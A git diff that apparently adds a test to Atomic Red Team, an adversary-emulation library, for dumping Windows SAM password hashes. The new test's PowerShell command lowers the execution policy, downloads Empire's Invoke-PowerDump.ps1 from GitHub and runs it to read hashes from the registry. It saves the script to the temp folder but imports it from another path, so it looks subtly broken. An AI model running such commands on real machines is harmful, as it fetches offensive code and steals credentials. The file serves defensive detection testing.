diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index ae3312a1..5ba30d65 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -78,4 +78,18 @@ atomic_tests:
       del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
     name: command_prompt
     elevation_required: true
-    
\ No newline at end of file
+    
+- name: PowerDump Registry dump of SAM for hashes and usernames
+  description: Executes a hashdump by reading the hasshes from the registry.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
+      Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
+      Invoke-Webrequest -Uri "https://github.com/BC-SECURITY/Empire/blob/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
+      Import-Module .\PowerDump.ps1
+      Invoke-PowerDump
+    name: powershell
+    elevation_required: true
+